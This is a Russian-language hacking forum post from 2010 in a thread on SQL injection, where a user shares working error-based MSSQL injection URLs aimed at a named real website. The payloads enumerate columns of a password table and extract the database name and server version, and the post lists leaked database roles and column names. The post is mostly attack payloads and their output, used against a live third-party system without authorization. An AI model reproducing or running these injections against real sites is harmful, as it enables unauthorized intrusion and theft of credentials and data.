HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #38  
Старый 23.02.2010, 20:21
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
mssql
перебирать впадляк но понятно что можно какой то софт взять но сам пробывал ...
Цитата:
http://www.iea.org/index_info.asp?id=854+or+1=(SELECT+TOP+1+COLUMN_NA ME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E='PASSWORD_T'+and+column_name+not+in+('ID'))--
БД:dbo,guest,INFORMATION_SCHEMA,sys,Ian,iea_read er,iea_data,Writer,Reader,db_owner...
Таблица PASSWORD_T:
'A','ACCESS_LEVEL','ADDRESS' ,'AFRICA','AIM' ,'ALUMNI','ANCHOR_NAME' ,'ARCHIVE_START' ,archiveid','ARRIVAL_DATE' ...
имя БД :
Цитата:
http://www.iea.org index_info.asp?id=854+or+1=(select+db_name())--+
версия:
Цитата:
http://www.iea.org/index_info.asp?id=854+or+1=@@version--+
Кстати здесь идеальная ошибка как писал забаненый cash --> Unclosed quotation mark after the character string
Последний раз редактировалось Strilo4ka; 23.02.2010 в 20:31..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.